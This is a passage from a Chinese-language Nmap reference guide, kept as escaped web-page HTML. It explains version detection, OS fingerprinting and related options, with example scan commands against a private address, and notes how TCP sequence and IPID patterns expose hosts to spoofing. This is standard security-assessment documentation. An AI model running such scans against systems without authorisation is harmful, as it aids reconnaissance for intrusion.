data-original=\"https:\/\/img-blog.csdn.net\/20170516173159861?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe10\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe10\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\">\u628aNmap\u6307\u5411\u4e00\u4e2a\u8fdc\u7a0b\u673a\u5668\uff0c\u5b83\u53ef\u80fd\u544a\u8bc9\u60a8 \u7aef\u53e325\/tcp\uff0c80\/tcp\uff0c\u548c53\/udp\u662f\u5f00\u653e\u7684\u3002\u4f7f\u7528\u5305\u542b\u5927\u7ea62,200\u4e2a\u8457\u540d\u7684\u670d\u52a1\u7684&nbsp;<code>nmap-services<\/code>\u6570\u636e\u5e93\uff0c Nmap\u53ef\u4ee5\u62a5\u544a\u90a3\u4e9b\u7aef\u53e3\u53ef\u80fd\u5206\u522b\u5bf9\u5e94\u4e8e\u4e00\u4e2a\u90ae\u4ef6\u670d\u52a1\u5668 (SMTP)\uff0cweb\u670d\u52a1\u5668(HTTP)\uff0c\u548c\u57df\u540d\u670d\u52a1\u5668(DNS)\u3002 \u8fd9\u79cd\u67e5\u8be2\u901a\u5e38\u662f\u6b63\u786e\u7684 -- \u4e8b\u5b9e\u4e0a\uff0c\u7edd\u5927\u591a\u6570\u5728TCP\u7aef\u53e325\u76d1\u542c\u7684\u5b88\u62a4\u8fdb\u7a0b\u662f\u90ae\u4ef6 \u670d\u52a1\u5668\u3002\u7136\u800c\uff0c\u60a8\u4e0d\u5e94\u8be5\u628a\u8d4c\u6ce8\u62bc\u5728\u8fd9\u4e0a\u9762! \u4eba\u4eec\u5b8c\u5168\u53ef\u4ee5\u5728\u4e00\u4e9b\u5947\u602a\u7684\u7aef\u53e3\u4e0a\u8fd0\u884c\u670d\u52a1\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5373\u4f7fNmap\u662f\u5bf9\u7684\uff0c\u5047\u8bbe\u8fd0\u884c\u670d\u52a1\u7684\u786e\u5b9e\u662f SMTP\uff0cHTTP\u548cDNS\uff0c\u90a3\u4e5f\u4e0d\u662f\u7279\u522b\u591a\u7684\u4fe1\u606f\u3002 \u5f53\u4e3a\u60a8\u7684\u516c\u53f8\u6216\u8005\u5ba2\u6237\u4f5c\u5b89\u5168\u8bc4\u4f30(\u6216\u8005\u751a\u81f3\u7b80\u5355\u7684\u7f51\u7edc\u660e\u7ec6\u6e05\u5355)\u65f6\uff0c \u60a8\u786e\u5b9e\u60f3\u77e5\u9053\u6b63\u5728\u8fd0\u884c\u4ec0\u4e48\u90ae\u4ef6\u548c\u57df\u540d\u670d\u52a1\u5668\u4ee5\u53ca\u5b83\u4eec\u7684\u7248\u672c\u3002 \u6709\u4e00\u4e2a\u7cbe\u786e\u7684\u7248\u672c\u53f7\u5bf9\u4e86\u89e3\u670d\u52a1\u5668\u6709\u4ec0\u4e48\u6f0f\u6d1e\u6709\u5de8\u5927\u5e2e\u52a9\u3002 \u7248\u672c\u63a2\u6d4b\u53ef\u4ee5\u5e2e\u60a8\u83b7\u5f97\u8be5\u4fe1\u606f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5728\u7528\u67d0\u79cd\u5176\u5b83\u7c7b\u578b\u7684\u626b\u63cf\u65b9\u6cd5\u53d1\u73b0TCP \u548c\/\u6216\u8005UDP\u7aef\u53e3\u540e\uff0c \u7248\u672c\u63a2\u6d4b\u4f1a\u8be2\u95ee\u8fd9\u4e9b\u7aef\u53e3\uff0c\u786e\u5b9a\u5230\u5e95\u4ec0\u4e48\u670d\u52a1\u6b63\u5728\u8fd0\u884c\u3002&nbsp;<code>nmap-service-probes<\/code>&nbsp;\u6570\u636e\u5e93\u5305\u542b\u67e5\u8be2\u4e0d\u540c\u670d\u52a1\u7684\u63a2\u6d4b\u62a5\u6587 \u548c\u89e3\u6790\u8bc6\u522b\u54cd\u5e94\u7684\u5339\u914d\u8868\u8fbe\u5f0f\u3002 Nmap\u8bd5\u56fe\u786e\u5b9a\u670d\u52a1\u534f\u8bae (\u5982 ftp\uff0cssh\uff0ctelnet\uff0chttp)\uff0c\u5e94\u7528\u7a0b\u5e8f\u540d(\u5982ISC Bind\uff0cApache httpd\uff0cSolaris telnetd)\uff0c\u7248\u672c\u53f7\uff0c \u4e3b\u673a\u540d\uff0c\u8bbe\u5907\u7c7b\u578b(\u5982 \u6253\u5370\u673a\uff0c\u8def\u7531\u5668)\uff0c\u64cd\u4f5c\u7cfb\u7edf\u5bb6\u65cf (\u5982Windows\uff0cLinux)\u4ee5\u53ca\u5176\u5b83\u7684\u7ec6\u8282\uff0c\u5982 \u5982\u662f\u5426\u53ef\u4ee5\u8fde\u63a5X server\uff0cSSH\u534f\u8bae\u7248\u672c \uff0c\u6216\u8005KaZaA\u7528\u6237\u540d)\u3002\u5f53\u7136\uff0c\u5e76\u975e\u6240\u6709\u670d\u52a1\u90fd\u63d0\u4f9b\u6240\u6709\u8fd9\u4e9b\u4fe1\u606f\u3002 \u5982\u679cNmap\u88ab\u7f16\u8bd1\u6210\u652f\u6301OpenSSL\uff0c \u5b83\u5c06\u8fde\u63a5\u5230SSL\u670d\u52a1\u5668\uff0c\u63a8\u6d4b\u4ec0\u4e48\u670d\u52a1\u5728\u52a0\u5bc6\u5c42\u540e\u9762\u76d1\u542c\u3002 \u5f53\u53d1\u73b0RPC\u670d\u52a1\u65f6\uff0c Nmap RPC grinder (<code>-sR<\/code>)\u4f1a\u81ea\u52a8\u88ab\u7528\u4e8e\u786e\u5b9aRPC\u7a0b\u5e8f\u548c\u5b83\u7684\u7248\u672c\u53f7\u3002 \u5982\u679c\u5728\u626b\u63cf\u67d0\u4e2aUDP\u7aef\u53e3\u540e\u4ecd\u7136\u65e0\u6cd5\u786e\u5b9a\u8be5\u7aef\u53e3\u662f\u5f00\u653e\u7684\u8fd8\u662f\u88ab\u8fc7\u6ee4\u7684\uff0c\u90a3\u4e48\u8be5\u7aef\u53e3\u72b6\u6001\u5c31 \u88ab\u6807\u8bb0\u4e3a<code>open|filtered<\/code>\u3002 \u7248\u672c\u63a2\u6d4b\u5c06\u8bd5\u56fe\u4ece\u8fd9\u4e9b\u7aef\u53e3\u5f15\u53d1\u4e00\u4e2a\u54cd\u5e94(\u5c31\u50cf\u5b83\u5bf9\u5f00\u653e\u7aef\u53e3\u505a\u7684\u4e00\u6837)\uff0c \u5982\u679c\u6210\u529f\uff0c\u5c31\u628a\u72b6\u6001\u6539\u4e3a\u5f00\u653e\u3002&nbsp;<code>open|filtered<\/code>&nbsp;TCP\u7aef\u53e3\u7528\u540c\u6837\u7684\u65b9\u6cd5\u5bf9\u5f85\u3002 \u6ce8\u610fNmap&nbsp;<code>-A<\/code>\u9009\u9879\u5728\u5176\u5b83\u60c5\u51b5\u4e0b\u6253\u5f00\u7248\u672c\u63a2\u6d4b\u3002 \u6709\u4e00\u7bc7\u5173\u4e8e\u7248\u672c\u63a2\u6d4b\u7684\u539f\u7406\uff0c\u4f7f\u7528\u548c\u5b9a\u5236\u7684\u6587\u7ae0\u5728&nbsp;<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/vscan\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/vscan\/\" rel=\"nofollow\" >http:\/\/www.insecure.org\/nmap\/vscan\/<\/a><\/a>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53Nmap\u4ece\u67d0\u4e2a\u670d\u52a1\u6536\u5230\u54cd\u5e94\uff0c\u4f46\u4e0d\u80fd\u5728\u6570\u636e\u5e93\u4e2d\u627e\u5230\u5339\u914d\u65f6\uff0c \u5b83\u5c31\u6253\u5370\u4e00\u4e2a\u7279\u6b8a\u7684fingerprint\u548c\u4e00\u4e2aURL\u7ed9\u60a8\u63d0\u4ea4\uff0c\u5982\u679c\u60a8\u786e\u5b9e\u77e5\u9053\u4ec0\u4e48\u670d\u52a1\u8fd0\u884c\u5728\u7aef\u53e3\u3002 \u8bf7\u82b1\u4e24\u5206\u949f\u63d0\u4ea4\u60a8\u7684\u53d1\u73b0\uff0c\u8ba9\u6bcf\u4e2a\u4eba\u53d7\u76ca\u3002\u7531\u4e8e\u8fd9\u4e9b\u63d0\u4ea4\uff0c Nmap\u6709350\u79cd\u4ee5\u4e0a\u534f\u8bae\u5982smtp\uff0cftp\uff0chttp\u7b49\u7684\u5927\u7ea63\uff0c000\u6761\u6a21\u5f0f\u5339\u914d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7528\u4e0b\u5217\u7684\u9009\u9879\u6253\u5f00\u548c\u63a7\u5236\u7248\u672c\u63a2\u6d4b\u3002<code>-sV<\/code>&nbsp;(\u7248\u672c\u63a2\u6d4b)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5f00\u7248\u672c\u63a2\u6d4b\u3002 \u60a8\u4e5f\u53ef\u4ee5\u7528<code>-A<\/code>\u540c\u65f6\u6253\u5f00\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b\u548c\u7248\u672c\u63a2\u6d4b\u3002\u8fd8\u53ef\u4ee5\u548c -A\u4e00\u8d77\u4f7f\u7528\u6765\u63a2\u6d4b\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1a nmap -sV -A 172.27.42.110<code>--allports<\/code>&nbsp;(\u5168\u7aef\u53e3\u7248\u672c\u63a2\u6d4b)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u7248\u672c\u63a2\u6d4b\u4f1a\u8df3\u8fc79100 TCP\u7aef\u53e3\uff0c\u56e0\u4e3a\u4e00\u4e9b\u6253\u5370\u673a\u7b80\u5355\u5730\u6253\u5370\u9001\u5230\u8be5\u7aef\u53e3\u7684 \u4efb\u4f55\u6570\u636e\uff0c\u8fd9\u56de\u5bfc\u81f4\u6570\u5341\u9875HTTP get\u8bf7\u6c42\uff0c\u4e8c\u8fdb\u5236 SSL\u4f1a\u8bdd\u8bf7\u6c42\u7b49\u7b49\u88ab\u6253\u5370\u51fa\u6765\u3002\u8fd9\u4e00\u884c\u4e3a\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u6216\u5220\u9664<code>nmap-service-probes<\/code>&nbsp;\u4e2d\u7684<code>Exclude<\/code>\u6307\u793a\u7b26\u6539\u53d8\uff0c \u60a8\u4e5f\u53ef\u4ee5\u4e0d\u7406\u4f1a\u4efb\u4f55<code>Exclude<\/code>\u6307\u793a\u7b26\uff0c\u6307\u5b9a<code>--allports<\/code>\u626b\u63cf\u6240\u6709\u7aef\u53e3<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sV --allport 172.27.42.110<code>--version-intensity &lt;intensity&gt;<\/code>&nbsp;(\u8bbe\u7f6e \u7248\u672c\u626b\u63cf\u5f3a\u5ea6)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u8fdb\u884c\u7248\u672c\u626b\u63cf(<code>-sV<\/code>)\u65f6\uff0cnmap\u53d1\u9001\u4e00\u7cfb\u5217\u63a2\u6d4b\u62a5\u6587 \uff0c\u6bcf\u4e2a\u62a5\u6587\u90fd\u88ab\u8d4b\u4e88\u4e00\u4e2a1\u52309\u4e4b\u95f4\u7684\u503c\u3002 \u88ab\u8d4b\u4e88\u8f83\u4f4e\u503c\u7684\u63a2\u6d4b\u62a5\u6587\u5bf9\u5927\u8303\u56f4\u7684\u5e38\u89c1\u670d\u52a1\u6709\u6548\uff0c\u800c\u88ab\u8d4b\u4e88\u8f83\u9ad8\u503c\u7684\u62a5\u6587 \u4e00\u822c\u6ca1\u4ec0\u4e48\u7528\u3002\u5f3a\u5ea6\u6c34\u5e73\u8bf4\u660e\u4e86\u5e94\u8be5\u4f7f\u7528\u54ea\u4e9b\u63a2\u6d4b\u62a5\u6587\u3002\u6570\u503c\u8d8a\u9ad8\uff0c \u670d\u52a1\u8d8a\u6709\u53ef\u80fd\u88ab\u6b63\u786e\u8bc6\u522b\u3002 \u7136\u800c\uff0c\u9ad8\u5f3a\u5ea6\u626b\u63cf\u82b1\u66f4\u591a\u65f6\u95f4\u3002\u5f3a\u5ea6\u503c\u5fc5\u987b\u57280\u548c9\u4e4b\u95f4\u3002 \u9ed8\u8ba4\u662f7\u3002\u5f53\u63a2\u6d4b\u62a5\u6587\u901a\u8fc7<code>nmap-service-probes<\/code>&nbsp;<code>ports<\/code>\u6307\u793a\u7b26 \u6ce8\u518c\u5230\u76ee\u6807\u7aef\u53e3\u65f6\uff0c\u65e0\u8bba\u4ec0\u4e48\u5f3a\u5ea6\u6c34\u5e73\uff0c\u63a2\u6d4b\u62a5\u6587\u90fd\u4f1a\u88ab\u5c1d\u8bd5\u3002\u8fd9\u4fdd\u8bc1\u4e86DNS \u63a2\u6d4b\u5c06\u6c38\u8fdc\u5728\u4efb\u4f55\u5f00\u653e\u768453\u7aef\u53e3\u5c1d\u8bd5\uff0c SSL\u63a2\u6d4b\u5c06\u5728443\u7aef\u53e3\u5c1d\u8bd5\uff0c\u7b49\u7b49\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sV&nbsp;--version-intensity 1&nbsp;172.27.42.110<code>--version-light<\/code>&nbsp;(\u6253\u5f00\u8f7b\u91cf\u7ea7\u6a21\u5f0f)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f&nbsp;<code>--version-intensity 2<\/code>\u7684\u65b9\u4fbf\u7684\u522b\u540d\u3002\u8f7b\u91cf\u7ea7\u6a21\u5f0f\u4f7f \u7248\u672c\u626b\u63cf\u5feb\u8bb8\u591a\uff0c\u4f46\u5b83\u8bc6\u522b\u670d\u52a1\u7684\u53ef\u80fd\u6027\u4e5f\u7565\u5fae\u5c0f\u4e00\u70b9\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sV&nbsp;--version-light&nbsp;172.27.42.110 &nbsp; &nbsp;\/\/ \u7b49\u4ef7\u4e8e&nbsp;nmap -sV&nbsp;--version-intensity 2&nbsp;172.27.42.110<br><code>--version-all<\/code>&nbsp;(\u5c1d\u8bd5\u6bcf\u4e2a\u63a2\u6d4b)<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--version-intensity 9<\/code>\u7684\u522b\u540d\uff0c \u4fdd\u8bc1\u5bf9\u6bcf\u4e2a\u7aef\u53e3\u5c1d\u8bd5\u6bcf\u4e2a\u63a2\u6d4b\u62a5\u6587\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sV&nbsp;--version-all&nbsp;172.27.42.110 &nbsp; &nbsp;\/\/ \u7b49\u4ef7\u4e8e&nbsp;nmap -sV&nbsp;--version-intensity 9 172.27.42.110<br><code>--version-trace<\/code>&nbsp;(\u8ddf\u8e2a\u7248\u672c\u626b\u63cf\u6d3b\u52a8)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u5bfc\u81f4Nmap\u6253\u5370\u51fa\u8be6\u7ec6\u7684\u5173\u4e8e\u6b63\u5728\u8fdb\u884c\u7684\u626b\u63cf\u7684\u8c03\u8bd5\u4fe1\u606f\u3002 \u5b83\u662f\u60a8\u7528<code>--packet-trace<\/code>\u6240\u5f97\u5230\u7684\u4fe1\u606f\u7684\u5b50\u96c6\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sV&nbsp;--version-trace&nbsp;172.27.42.110<code>-sR<\/code>&nbsp;(RPC\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u79cd\u65b9\u6cd5\u548c\u8bb8\u591a\u7aef\u53e3\u626b\u63cf\u65b9\u6cd5\u8054\u5408\u4f7f\u7528\u3002 \u5b83\u5bf9\u6240\u6709\u88ab\u53d1\u73b0\u5f00\u653e\u7684TCP\/UDP\u7aef\u53e3\u6267\u884cSunRPC\u7a0b\u5e8fNULL\u547d\u4ee4\uff0c\u6765\u8bd5\u56fe \u786e\u5b9a\u5b83\u4eec\u662f\u5426RPC\u7aef\u53e3\uff0c\u5982\u679c\u662f\uff0c \u662f\u4ec0\u4e48\u7a0b\u5e8f\u548c\u7248\u672c\u53f7\u3002\u56e0\u6b64\u60a8\u53ef\u4ee5\u6709\u6548\u5730\u83b7\u5f97\u548c<strong>rpcinfo -p<\/strong>\u4e00\u6837\u7684\u4fe1\u606f\uff0c \u5373\u4f7f\u76ee\u6807\u7684\u7aef\u53e3\u6620\u5c04\u5728\u9632\u706b\u5899\u540e\u9762(\u6216\u8005\u88abTCP\u5305\u88c5\u5668\u4fdd\u62a4)\u3002Decoys\u76ee\u524d\u4e0d\u80fd\u548cRPC scan\u4e00\u8d77\u5de5\u4f5c\u3002 \u8fd9\u4f5c\u4e3a\u7248\u672c\u626b\u63cf(<code>-sV<\/code>)\u7684\u4e00\u90e8\u5206\u81ea\u52a8\u6253\u5f00\u3002 \u7531\u4e8e\u7248\u672c\u63a2\u6d4b\u5305\u62ec\u5b83\u5e76\u4e14\u5168\u9762\u5f97\u591a\uff0c<code>-sR<\/code>\u5f88\u5c11\u88ab\u9700\u8981\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sS -sR&nbsp;172.27.42.110<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b<\/h1>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u6700\u8457\u540d\u7684\u529f\u80fd\u4e4b\u4e00\u662f\u7528TCP\/IP\u534f\u8bae\u6808fingerprinting\u8fdb\u884c\u8fdc\u7a0b\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b\u3002 Nmap\u53d1\u9001\u4e00\u7cfb\u5217TCP\u548cUDP\u62a5\u6587\u5230\u8fdc\u7a0b\u4e3b\u673a\uff0c\u68c0\u67e5\u54cd\u5e94\u4e2d\u7684\u6bcf\u4e00\u4e2a\u6bd4\u7279\u3002 \u5728\u8fdb\u884c\u4e00\u6253\u6d4b\u8bd5\u5982TCP ISN\u91c7\u6837\uff0cTCP\u9009\u9879\u652f\u6301\u548c\u6392\u5e8f\uff0cIPID\u91c7\u6837\uff0c\u548c\u521d\u59cb\u7a97\u53e3\u5927\u5c0f\u68c0\u67e5\u4e4b\u540e\uff0c Nmap\u628a\u7ed3\u679c\u548c\u6570\u636e\u5e93<code>nmap-os-fingerprints<\/code>\u4e2d\u8d85\u8fc7 1500\u4e2a\u5df2\u77e5\u7684\u64cd\u4f5c\u7cfb\u7edf\u7684fingerprints\u8fdb\u884c\u6bd4\u8f83\uff0c\u5982\u679c\u6709\u5339\u914d\uff0c\u5c31\u6253\u5370\u51fa\u64cd\u4f5c\u7cfb\u7edf\u7684\u8be6\u7ec6\u4fe1\u606f\u3002 \u6bcf\u4e2afingerprint\u5305\u62ec\u4e00\u4e2a\u81ea\u7531\u683c\u5f0f\u7684\u5173\u4e8eOS\u7684\u63cf\u8ff0\u6587\u672c\uff0c \u548c\u4e00\u4e2a\u5206\u7c7b\u4fe1\u606f\uff0c\u5b83\u63d0\u4f9b\u4f9b\u5e94\u5546\u540d\u79f0(\u5982Sun)\uff0c\u4e0b\u9762\u7684\u64cd\u4f5c\u7cfb\u7edf(\u5982Solaris)\uff0cOS\u7248\u672c(\u598210)\uff0c \u548c\u8bbe\u5907\u7c7b\u578b(\u901a\u7528\u8bbe\u5907\uff0c\u8def\u7531\u5668\uff0cswitch\uff0c\u6e38\u620f\u63a7\u5236\u53f0\uff0c \u7b49)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679cNmap\u4e0d\u80fd\u731c\u51fa\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5e76\u4e14\u6709\u4e9b\u597d\u7684\u5df2\u77e5\u6761\u4ef6(\u5982 \u81f3\u5c11\u53d1\u73b0\u4e86\u4e00\u4e2a\u5f00\u653e\u7aef\u53e3\u548c\u4e00\u4e2a\u5173\u95ed\u7aef\u53e3)\uff0cNmap\u4f1a\u63d0\u4f9b\u4e00\u4e2a URL\uff0c\u5982\u679c\u60a8\u786e\u77e5\u8fd0\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u60a8\u53ef\u4ee5\u628afingerprint\u63d0\u4ea4\u5230\u90a3\u4e2aURL\u3002 \u8fd9\u6837\u60a8\u5c31\u6269\u5927\u4e86Nmap\u7684\u64cd\u4f5c\u7cfb\u7edf\u77e5\u8bc6\u5e93\uff0c\u4ece\u800c\u8ba9\u6bcf\u4e2aNmap\u7528\u6237\u90fd\u53d7\u76ca\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u53ef\u4ee5\u8fdb\u884c\u5176\u5b83\u4e00\u4e9b\u6d4b\u8bd5\uff0c\u8fd9\u4e9b\u6d4b\u8bd5\u53ef\u4ee5\u5229\u7528\u5904\u7406 \u8fc7\u7a0b\u4e2d\u6536\u96c6\u5230\u7684\u4fe1\u606f\u3002\u4f8b\u5982\u8fd0\u884c\u65f6\u95f4\u68c0\u6d4b\uff0c\u4f7f\u7528TCP\u65f6\u95f4\u6233\u9009\u9879(RFC 1323) \u6765\u4f30\u8ba1\u4e3b\u673a\u4e0a\u6b21\u91cd\u542f\u7684\u65f6\u95f4\uff0c\u8fd9\u4ec5\u9002\u7528\u4e8e\u63d0\u4f9b\u8fd9\u7c7b\u4fe1\u606f\u7684\u4e3b\u673a\u3002\u53e6\u4e00\u79cd \u662fTCP\u5e8f\u5217\u53f7\u9884\u6d4b\u5206\u7c7b\uff0c\u7528\u4e8e\u6d4b\u8bd5\u9488\u5bf9\u8fdc\u7a0b\u4e3b\u673a\u5efa\u7acb\u4e00\u4e2a\u4f2a\u9020\u7684TCP\u8fde\u63a5 \u7684\u53ef\u80fd\u96be\u5ea6\u3002\u8fd9\u5bf9\u4e8e\u5229\u7528\u57fa\u4e8e\u6e90IP\u5730\u5740\u7684\u53ef\u4fe1\u5173\u7cfb(rlogin\uff0c\u9632\u706b\u5899\u8fc7\u6ee4\u7b49) \u6216\u8005\u9690\u542b\u6e90\u5730\u5740\u7684\u653b\u51fb\u975e\u5e38\u91cd\u8981\u3002\u8fd9\u4e00\u7c7b\u54c4\u9a97\u653b\u51fb\u73b0\u5728\u5f88\u5c11\u89c1\uff0c\u4f46\u4e00\u4e9b \u4e3b\u673a\u4ecd\u7136\u5b58\u5728\u8fd9\u65b9\u9762\u7684\u6f0f\u6d1e\u3002\u5b9e\u9645\u7684\u96be\u5ea6\u503c\u57fa\u4e8e\u7edf\u8ba1\u91c7\u6837\uff0c\u56e0\u6b64\u53ef\u80fd\u4f1a\u6709 \u4e00\u4e9b\u6ce2\u52a8\u3002\u901a\u5e38\u91c7\u7528\u82f1\u56fd\u7684\u5206\u7c7b\u8f83\u597d\uff0c\u5982\u201cworthy challenge\u201d\u6216\u8005&nbsp;\u201ctrivial joke\u201d\u3002\u5728\u8be6\u7ec6\u6a21\u5f0f(<code>-v<\/code>)\u4e0b\u53ea\u4ee5 \u666e\u901a\u7684\u65b9\u5f0f\u8f93\u51fa\uff0c\u5982\u679c\u540c\u65f6\u4f7f\u7528<code>-O<\/code>\uff0c\u8fd8\u62a5\u544aIPID\u5e8f\u5217\u4ea7\u751f\u53f7\u3002 \u5f88\u591a\u4e3b\u673a\u7684\u5e8f\u5217\u53f7\u662f\u201c\u589e\u52a0\u201d\u7c7b\u522b\uff0c\u5373\u5728\u6bcf\u4e2a\u53d1\u9001\u5305\u7684IP\u5934\u4e2d \u589e\u52a0ID\u57df\u503c\uff0c \u8fd9\u5bf9\u4e00\u4e9b\u5148\u8fdb\u7684\u4fe1\u606f\u6536\u96c6\u548c\u54c4\u9a97\u653b\u51fb\u6765\u8bf4\u662f\u4e2a\u6f0f\u6d1e\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/osdetect.html\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/osdetect.html\" rel=\"nofollow\" >https:\/\/nmap.org\/book\/osdetect.html<\/a><\/a>&nbsp;\u6587\u6863\u4f7f\u7528\u591a\u79cd\u8bed\u8a00\u63cf\u8ff0\u4e86\u7248\u672c\u68c0\u6d4b\u7684\u65b9\u5f0f\u3001\u4f7f\u7528\u548c\u5b9a\u5236\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u91c7\u7528\u4e0b\u5217\u9009\u9879\u542f\u7528\u548c\u63a7\u5236\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b:<code>-O<\/code>&nbsp;(\u542f\u7528\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u3002\u5927\u5199\u5b57\u6bcd O\uff0c\u4e0d\u662f\u6570\u5b570)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u53ef\u4ee5\u4f7f\u7528<code>-A<\/code>\u6765\u540c\u65f6\u542f\u7528\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u548c\u7248\u672c\u68c0\u6d4b\u3002\u4f8b\u5b50\uff1anmap -O 172.27.42.110<code>--osscan-limit<\/code>&nbsp;(\u9488\u5bf9\u6307\u5b9a\u7684\u76ee\u6807\u8fdb\u884c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53d1\u73b0\u4e00\u4e2a\u6253\u5f00\u548c\u5173\u95ed\u7684TCP\u7aef\u53e3\u65f6\uff0c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u4f1a\u66f4\u6709\u6548\u3002 \u91c7\u7528\u8fd9\u4e2a\u9009\u9879\uff0cNmap\u53ea\u5bf9\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\u7684\u4e3b\u673a\u8fdb\u884c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\uff0c\u8fd9\u6837\u53ef\u4ee5 \u8282\u7ea6\u65f6\u95f4\uff0c\u7279\u522b\u5728\u4f7f\u7528<code>-P0<\/code>\u626b\u63cf\u591a\u4e2a\u4e3b\u673a\u65f6\u3002\u8fd9\u4e2a\u9009\u9879\u4ec5\u5728\u4f7f\u7528&nbsp;<code>-O<\/code>\u6216<code>-A<\/code>&nbsp;\u8fdb\u884c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u65f6\u8d77\u4f5c\u7528\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -O --osscan-limit 172.27.42.110 &nbsp;\/\/\u8fd9\u4e2a\u9009\u9879\u4ec5\u5728\u4f7f\u7528 -O\u6216-A \u8fdb\u884c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u65f6\u8d77\u4f5c\u7528\u3002<code>--osscan-guess<\/code>;&nbsp;<code>--fuzzy<\/code>&nbsp;(\u63a8\u6d4b\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u7ed3\u679c)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53Nmap\u65e0\u6cd5\u786e\u5b9a\u6240\u68c0\u6d4b\u7684\u64cd\u4f5c\u7cfb\u7edf\u65f6\uff0c\u4f1a\u5c3d\u53ef\u80fd\u5730\u63d0\u4f9b\u6700\u76f8\u8fd1\u7684\u5339\u914d\uff0cNmap\u9ed8\u8ba4 \u8fdb\u884c\u8fd9\u79cd\u5339\u914d\uff0c\u4f7f\u7528\u4e0a\u8ff0\u4efb\u4e00\u4e2a\u9009\u9879\u4f7f\u5f97Nmap\u7684\u63a8\u6d4b\u66f4\u52a0\u6709\u6548\u3002\u4f8b\u5b50\uff1anmap -O --osscan-guess 172.27.42.110 &nbsp;<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u65f6\u95f4\u548c\u6027\u80fd<\/h1>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u5f00\u53d1\u7684\u6700\u9ad8\u4f18\u5148\u7ea7\u662f\u6027\u80fd\u3002\u5728\u672c\u5730\u7f51\u7edc\u5bf9\u4e00\u4e2a\u4e3b\u673a\u7684\u9ed8\u8ba4\u626b\u63cf(<strong>nmap&nbsp;<em><code>&lt;hostname&gt;<\/code><\/em><\/strong>)\u9700\u89811\/5\u79d2\u3002\u800c\u4ec5\u4ec5\u7728\u773c\u7684 \u65f6\u95f4\uff0c\u5c31\u9700\u8981\u626b\u63cf\u4e0a\u4e07\u751a\u81f3\u51e0\u5341\u4e07\u7684\u4e3b\u673a\u3002\u6b64\u5916\uff0c\u4e00\u4e9b\u7279\u5b9a\u7684\u626b\u63cf\u9009\u9879\u4f1a\u660e\u663e\u589e 